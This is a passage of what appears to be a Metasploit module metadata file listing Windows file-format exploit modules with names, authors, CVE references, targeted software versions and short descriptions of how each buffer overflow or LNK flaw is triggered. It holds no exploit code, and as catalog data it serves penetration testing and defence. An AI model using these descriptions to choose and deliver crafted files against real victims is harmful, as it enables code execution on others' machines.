"EDB-11204", + "URL-http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/aol_phobos_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/apple_quicktime_pnsize": { + "name": "Apple QuickTime PICT PnSize Buffer Overflow", + "fullname": "exploit/windows/fileformat/apple_quicktime_pnsize", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-08-08", + "type": "exploit", + "author": [ + "MC ", + "corelanc0d3r " + ], + "description": "This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.\n When opening a .mov file containing a specially crafted PnSize value, an attacker\n may be able to execute arbitrary code.", + "references": [ + "CVE-2011-0257", + "OSVDB-74687", + "EDB-17777", + "BID-49144" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 with DEP bypass" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/apple_quicktime_pnsize", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/apple_quicktime_rdrf": { + "name": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", + "fullname": "exploit/windows/fileformat/apple_quicktime_rdrf", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-22", + "type": "exploit", + "author": [ + "Jason Kratzer", + "Tom Gallagher", + "Paul Bates", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Apple QuickTime. The flaw is\n triggered when QuickTime fails to properly handle the data length for certain\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\n overflow by loading a specially crafted .mov file, and allows arbitrary\n code execution under the context of the current user. Please note: Since an egghunter\n is used to search for the payload, this may require additional time for\n the exploit to complete.", + "references": [ + "CVE-2013-1017", + "OSVDB-93625", + "BID-60097", + "URL-http://support.apple.com/kb/HT5770", + "ZDI-13-110" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Quicktime 7.7.0 - 7.7.3 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/apple_quicktime_rdrf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/apple_quicktime_texml": { + "name": "Apple QuickTime TeXML Style Element Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/apple_quicktime_texml", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-15", + "type": "exploit", + "author": [ + "Alexander Gavrun", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in Apple QuickTime. When handling\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\n gain arbitrary code execution under the context of the user. This is due to the\n QuickTime3GPP.gtx component not handling certain Style subfields properly, storing\n user-supplied data on the stack, which results the overflow.", + "references": [ + "OSVDB-81934", + "CVE-2012-0663", + "BID-53571", + "ZDI-12-107", + "URL-http://0x1byte.blogspot.com/2012/06/cve-2012-0663-and-cve-2012-0664-samples.html", + "URL-http://support.apple.com/kb/HT1222" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "QuickTime 7.7.1 on Windows XP SP3", + "QuickTime 7.7.0 on Windows XP SP3", + "QuickTime 7.6.9 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/apple_quicktime_texml.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/apple_quicktime_texml", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/audio_coder_m3u": { + "name": "AudioCoder .M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/audio_coder_m3u", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-01", + "type": "exploit", + "author": [ + "metacom", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability\n occurs when adding an .m3u, allowing arbitrary code execution with the privileges\n of the user running AudioCoder. This module has been tested successfully on\n AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2017-8870", + "OSVDB-92939", + "EDB-25141" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/audio_coder_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/audio_coder_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/audio_wkstn_pls": { + "name": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", + "fullname": "exploit/windows/fileformat/audio_wkstn_pls", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-12-08", + "type": "exploit", + "author": [ + "germaya_x", + "dookie" + ], + "description": "This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n When opening a malicious pls file with the Audio Workstation,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", + "references": [ + "CVE-2009-0476", + "OSVDB-55424", + "EDB-10353" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/audio_wkstn_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/audiotran_pls": { + "name": "Audiotran 1.4.1 (PLS File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/audiotran_pls", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-01-09", + "type": "exploit", + "author": [ + "Sebastien Duquette", + "dookie" + ], + "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Audiotran.\n This functionality has not been tested in this module.", + "references": [ + "CVE-2009-0476", + "OSVDB-55424", + "EDB-11079" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/audiotran_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/audiotran_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/audiotran_pls_1424": { + "name": "Audiotran PLS File Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/audiotran_pls_1424", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-09-09", + "type": "exploit", + "author": [ + "Philip OKeefe" + ], + "description": "This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively, it may be possible to execute code remotely via an embedded\n PLS file within a browser when the PLS extension is registered to Audiotran.\n This alternate vector has not been tested and cannot be exercised directly\n with this module.", + "references": [ + "EDB-14961" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/audiotran_pls_1424.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/audiotran_pls_1424", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/aviosoft_plf_buf": { + "name": "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/aviosoft_plf_buf", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-11-09", + "type": "exploit", + "author": [ + "modpr0be", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Aviosoft Digital TV Player\n Pro version 1.x. An overflow occurs when the process copies the content of a\n playlist file on to the stack, which may result arbitrary code execution under\n the context of the user.", + "references": [ + "OSVDB-77043", + "EDB-18096" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Aviosoft DTV Player 1.0.1.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/aviosoft_plf_buf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/bacnet_csv": { + "name": "BACnet OPC Client Buffer Overflow", + "fullname": "exploit/windows/fileformat/bacnet_csv", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-09-16", + "type": "exploit", + "author": [ + "Jeremy Brown", + "MC " + ], + "description": "This module exploits a stack buffer overflow in SCADA\n Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client\n parses a specially crafted csv file, arbitrary code may be\n executed.", + "references": [ + "CVE-2010-4740", + "OSVDB-68096", + "BID-43289", + "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-264-01" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 English", + "Windows 2000 SP4 English" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/fileformat/bacnet_csv.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/bacnet_csv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/beetel_netconfig_ini_bof": { + "name": "Beetel Connection Manager NetConfig.ini Buffer Overflow", + "fullname": "exploit/windows/fileformat/beetel_netconfig_ini_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-12", + "type": "exploit", + "author": [ + "metacom", + "wvu " + ], + "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n Manager. The vulnerability exists in the parsing of the UserName\n parameter in the NetConfig.ini file.\n\n The module has been tested successfully against version\n PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "OSVDB-98714", + "EDB-28969" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)" + ], + "mod_time": "2020-02-04 10:05:41 +0000", + "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/beetel_netconfig_ini_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/blazedvd_hdtv_bof": { + "name": "BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability", + "fullname": "exploit/windows/fileformat/blazedvd_hdtv_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-03", + "type": "exploit", + "author": [ + "b33f", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in BlazeVideo HDTV Player's filename\n handling routine. When supplying a string of input data embedded in a .plf file,\n the MediaPlayerCtrl.dll component will try to extract a filename by using\n PathFindFileNameA(), and then copies whatever the return value is on the stack by\n using an inline strcpy. As a result, if this input data is long enough, it can cause\n a stack-based buffer overflow, which may lead to arbitrary code execution under the\n context of the user.", + "references": [ + "OSVDB-80896", + "EDB-18693", + "EDB-22931" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BlazeVideo HDTV Player Pro v6.6.0.3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/blazedvd_hdtv_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/blazedvd_plf": { + "name": "BlazeDVD 6.1 PLF Buffer Overflow", + "fullname": "exploit/windows/fileformat/blazedvd_plf", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-08-03", + "type": "exploit", + "author": [ + "MC ", + "Deepak Rathore", + "Spencer McIntyre", + "Ken Smith" + ], + "description": "This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When\n the application is used to open a specially crafted plf file,\n a buffer is overwritten allowing for the execution of arbitrary code.", + "references": [ + "CVE-2006-6199", + "EDB-32737", + "OSVDB-30770", + "BID-35918" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BlazeDVD 6.2", + "BlazeDVD 5.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/blazedvd_plf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/blazedvd_plf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/boxoft_wav_to_mp3": { + "name": "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow", + "fullname": "exploit/windows/fileformat/boxoft_wav_to_mp3", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-08-31", + "type": "exploit", + "author": [ + "Robbie Corley", + "Shelby Pace" + ], + "description": "This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.\n By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the\n application, a buffer is overwritten, which allows for running shellcode.", + "references": [ + "CVE-2015-7243", + "EDB-38035" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Boxoft WAV to MP3 Converter v1.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/boxoft_wav_to_mp3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/bpftp_client_bps_bof": { + "name": "BulletProof FTP Client BPS Buffer Overflow", + "fullname": "exploit/windows/fileformat/bpftp_client_bps_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-07-24", + "type": "exploit", + "author": [ + "Gabor Seljan" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n BulletProof FTP Client 2010, caused by an overly long hostname.\n\n By persuading the victim to open a specially-crafted .BPS file, a\n remote attacker could execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3.", + "references": [ + "EDB-34162", + "EDB-34540", + "EDB-35449", + "OSVDB-109547", + "CVE-2014-2973" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/bpftp_client_bps_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/bsplayer_m3u": { + "name": "BS.Player 2.57 Buffer Overflow (Unicode SEH)", + "fullname": "exploit/windows/fileformat/bsplayer_m3u", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-07", + "type": "exploit", + "author": [ + "C4SS!0 G0M3S", + "Chris Gabriel" + ], + "description": "This module exploits a buffer overflow in BS.Player 2.57. When\n the playlist import is used to import a specially crafted m3u file,\n a buffer overflow occurs allowing arbitrary code execution.", + "references": [ + "OSVDB-82528", + "EDB-15934" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP", + "Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/bsplayer_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/bsplayer_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ca_cab": { + "name": "CA Antivirus Engine CAB Buffer Overflow", + "fullname": "exploit/windows/fileformat/ca_cab", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-06-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\n By creating a specially crafted CAB file, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2007-2864", + "OSVDB-35245", + "BID-24330", + "ZDI-07-035" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ca_cab.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ca_cab", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cain_abel_4918_rdp": { + "name": "Cain and Abel RDP Buffer Overflow", + "fullname": "exploit/windows/fileformat/cain_abel_4918_rdp", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-11-30", + "type": "exploit", + "author": [ + "Trancek " + ], + "description": "This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24\n and below. An attacker must send the file to victim, and the victim must open\n the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.", + "references": [ + "CVE-2008-5405", + "OSVDB-50342", + "EDB-7329", + "BID-32543" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 English", + "Windows XP SP0/1 English", + "Windows XP SP2 Spanish" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cain_abel_4918_rdp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ccmplayer_m3u_bof": { + "name": "CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow", + "fullname": "exploit/windows/fileformat/ccmplayer_m3u_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-11-30", + "type": "exploit", + "author": [ + "Rh0" + ], + "description": "This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening\n a m3u playlist with a long track name, a SEH exception record can be overwritten\n with parts of the controllable buffer. SEH execution is triggered after an\n invalid read of an injectable address, thus allowing arbitrary code execution.\n This module works on multiple Windows platforms including: Windows XP SP3,\n Windows Vista, and Windows 7.", + "references": [ + "CVE-2011-5170", + "OSVDB-77453", + "EDB-18178" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CCMPlayer 1.5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ccmplayer_m3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/chasys_draw_ies_bmp_bof": { + "name": "Chasys Draw IES Buffer Overflow", + "fullname": "exploit/windows/fileformat/chasys_draw_ies_bmp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-26", + "type": "exploit", + "author": [ + "Christopher Gabriel", + "Longinos Recuero Bustos", + "Javier 'soez'", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability found in Chasys Draw IES\n (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while\n parsing BMP files, where the ReadFile function is used to store user provided data\n on the stack in an insecure way. It results in arbitrary code execution under the\n context of the user viewing a specially crafted BMP file. This module has been\n tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7\n SP1.", + "references": [ + "CVE-2013-3928", + "OSVDB-95689", + "BID-61463", + "URL-http://web.archive.org/web/20140326093457/http://secunia.com/advisories/53773/", + "URL-http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/chasys_draw_ies_bmp_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/coolpdf_image_stream_bof": { + "name": "Cool PDF Image Stream Buffer Overflow", + "fullname": "exploit/windows/fileformat/coolpdf_image_stream_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-18", + "type": "exploit", + "author": [ + "Francis Provencher", + "Chris Gabriel", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in Cool PDF Reader prior to version\n 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that\n contains a specially crafted image stream. This module has been tested successfully\n on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2012-4914", + "OSVDB-89349", + "EDB-24463", + "URL-http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=70&Itemid=70" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Cool PDF 3.0.2.256 / Windows 7 SP1 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/coolpdf_image_stream_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/corelpdf_fusion_bof": { + "name": "Corel PDF Fusion Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/corelpdf_fusion_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-08", + "type": "exploit", + "author": [ + "Kaveh Ghaemmaghami", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in version 1.11 of\n Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry\n names. In order for the payload to be executed, an attacker must convince the target\n user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the\n attacker can execute arbitrary code as the target user.", + "references": [ + "CVE-2013-3248", + "OSVDB-94933", + "BID-61010", + "URL-http://web.archive.org/web/20130720043800/http://secunia.com:80/advisories/52707/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Corel PDF Fusion 1.11 / Windows XP SP3" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/corelpdf_fusion_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/csound_getnum_bof": { + "name": "Csound hetro File Handling Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/csound_getnum_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-23", + "type": "exploit", + "author": [ + "Secunia", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in Csound before 5.16.6.\n The overflow occurs when trying to import a malicious hetro file\n from tabular format.\n In order to achieve exploitation the user should import the malicious\n file through csound with a command like \"csound -U het_import msf.csd file.het\".\n This exploit doesn't work if the \"het_import\" command is used directly\n to convert the file.", + "references": [ + "CVE-2012-0270", + "OSVDB-79491", + "BID-52144", + "URL-http://web.archive.org/web/20120514124556/http://secunia.com/secunia_research/2012-3/", + "URL-http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Csound 5.15 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/csound_getnum_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/csound_getnum_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cutezip_bof": { + "name": "GlobalSCAPE CuteZIP Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/cutezip_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-12", + "type": "exploit", + "author": [ + "C4SS!0 G0M3S ", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of CuteZIP.\n\n In order for the command to be executed, an attacker must convince the target user\n to open a specially crafted zip file with CuteZIP. By doing so, an attacker can\n execute arbitrary code as the target user.", + "references": [ + "OSVDB-85709", + "EDB-16162", + "BID-46375" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CuteZIP 2.1 / Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cutezip_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cutezip_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cve_2017_8464_lnk_rce": { + "name": "LNK Code Execution Vulnerability", + "fullname": "exploit/windows/fileformat/cve_2017_8464_lnk_rce", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-06-13", + "type": "exploit", + "author": [ + "Uncredited", + "Yorick Koster", + "Spencer McIntyre" + ], + "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n If no PATH is specified, the module will use drive letters D through Z so the files\n may be placed in the root path of a drive such as a shared VM folder or USB drive.", + "references": [ + "CVE-2017-8464", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464", + "URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt", + "URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx", + "URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm", + "URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows x64", + "Windows x86" + ], + "mod_time": "2023-03-13 10:31:27 +0000", + "path": "/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cve_2017_8464_lnk_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cyberlink_lpp_bof": { + "name": "CyberLink LabelPrint 2.5 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/cyberlink_lpp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-09-23", + "type": "exploit", + "author": [ + "modpr0be ", + "f3ci " + ], + "description": "This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.\n The vulnerability is triggered when opening a .lpp project file containing overly long string characters\n via open file menu. This results in overwriting a structured exception handler record and take over the\n application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).", + "references": [ + "CVE-2017-14627", + "EDB-42777" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CyberLink LabelPrint <= 2.5 on Windows 7 (64 bit)", + "CyberLink LabelPrint <= 2.5 on Windows 8.1 x64", + "CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803" + ], + 